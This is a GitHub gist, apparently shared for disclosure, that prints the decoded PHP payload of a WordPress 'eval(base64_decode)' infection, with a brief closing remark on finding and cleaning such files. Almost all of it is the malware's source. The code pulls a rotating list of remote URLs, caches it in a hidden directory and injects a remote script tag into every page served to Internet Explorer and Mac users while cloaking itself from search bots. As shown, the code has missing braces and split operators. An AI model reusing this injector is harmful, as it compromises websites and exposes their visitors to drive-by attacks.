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Created March 3, 2012 07:56
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Save amster/1964927 to your computer and use it in GitHub Desktop.
WordPress PHP hack, a.k.a. eval(base64_decode('aWYoZ...
if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (!function_exists('mrobh')) {
function get_tds_777($url) {
$content = "";
$content = @trycurl_777($url);
if ($content !== false) return $content;
$content = @tryfile_777($url);
if ($content !== false) return $content;
$content = @tryfopen_777($url);
if ($content !== false) return $content;
$content = @tryfsockopen_777($url);
if ($content !== false) return $content;
$content = @trysocket_777($url);
if ($content !== false) return $content;
return '';
function trycurl_777($url) {
if (function_exists('curl_init') === false) return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
if ($result == "") return false;
return $result;
function tryfile_777($url) {
if (function_exists('file') === false) return false;
$inc = @file($url);
$buf = @implode('', $inc);
if ($buf == "") return false;
return $buf;
function tryfopen_777($url) {
if (function_exists('fopen') === false) return false;
$buf = '';
$f = @fopen($url, 'r');
if ($f) {
while (!feof($f)) {
$buf. = fread($f, 10000);
else return false;
if ($buf == "") return false;
return $buf;
function tryfsockopen_777($url) {
if (function_exists('fsockopen') === false) return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'].'?'.$p['query'];
$f = @fsockopen($host, 80, $errno, $errstr, 30);
if (!$f) return false;
$request = "GET $uri HTTP/1.0\\n";
$request. = "Host: $host\\n\\n";
fwrite($f, $request);
$buf = '';
while (!feof($f)) {
$buf. = fread($f, 10000);
if ($buf == "") return false;
list($m, $buf) = explode(chr(13).chr(10).chr(13).chr(10), $buf);
return $buf;
function trysocket_777($url) {
if (function_exists('socket_create') === false) return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'].'?'.$p['query'];
$ip1 = @gethostbyname($host);
$ip2 = @long2ip(@ip2long($ip1));
if ($ip1 != $ip2) return false;
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!@socket_connect($sock, $ip1, 80)) {@socket_close($sock);
return false;
$request = "GET $uri HTTP/1.0\\n";
$request. = "Host: $host\\n\\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf. = $t;
if ($buf == "") return false;
list($m, $buf) = explode(chr(13).chr(10).chr(13).chr(10), $buf);
return $buf;
function update_tds_file_777($tdsfile) {
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "") $val = get_tds_777($actual2);
$f = @fopen($tdsfile, "w");
if ($f) {@fwrite($f, $val);@fclose($f);
if (strstr($val, "|||CODE|||")) {
list($val, $code) = explode("|||CODE|||", $val);
return $val;
function get_actual_tds_777() {
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir."log1.txt";
if (@file_exists($tdsfile)) {
$mtime = @filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
else {
$content = @file_get_contents($tdsfile);
else {
$content = update_tds_file_777($tdsfile);
$tds = @explode("\\n", $content);
$c = @count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
return $url;
function is_mac_777($ua) {
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari")) if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone"))) $mac = 1;
return $mac;
function is_msie_777($ua) {
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9")) $msie = 1;
return $msie;
function setup_globals_777() {
$rz = $_SERVER["DOCUMENT_ROOT"]."/.logs/";
$mz = "/tmp/";
if (!is_dir($rz)) {@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
else {
$rz = $_SERVER["SCRIPT_FILENAME"]."/.logs/";
if (!is_dir($rz)) {@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
else {
$mz = $rz;
else {
$mz = $rz;
$bot = 0;
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo")) $bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google")) $bot = 1;
$msie = 0;
if (is_msie_777($ua)) $msie = 1;
$mac = 0;
if (is_mac_777($ua)) $mac = 1;
if (($msie == 0) && ($mac == 0)) $bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "";
$d = '?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = ''.$d;
$_SERVER['s_a2'] = ''.$d;
$_SERVER['s_script'] = "nl.php?p=d";
if (!function_exists('gml_777')) {
function gml_777() {
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0) $r_string_777 = '<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"></script>';
return $r_string_777;
if (!function_exists('gzdecodeit')) {
function gzdecodeit($decode) {
$t = @ord(@substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = @unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
if ($t & 8) {
$start = @strpos($decode, chr(0), $start) + 1;
if ($t & 16) {
$start = @strpos($decode, chr(0), $start) + 1;
if ($t & 2) {
$start += 2;
$ret = @gzinflate(@substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
return $ret;
function mrobh($content) {@Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\\<\\/body/si', $decoded_content)) {
return preg_replace('/(\\<\\/body[^\\>]*\\>)/si', gml_777()."\\n".'$1', $decoded_content);
else {
return $decoded_content.gml_777();
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One way to track down malware infected PHP files is to search the root directory and all sub-directories of your site for files containing Base64. It will return some false positives as there are valid, non-malicious uses for Base64. Here’s a six step guide on Cleaning php eval(base64_decode()) hack from a WordPress site, which i found recently, and they have jotted down some nicely written things which you may want to have a look at .

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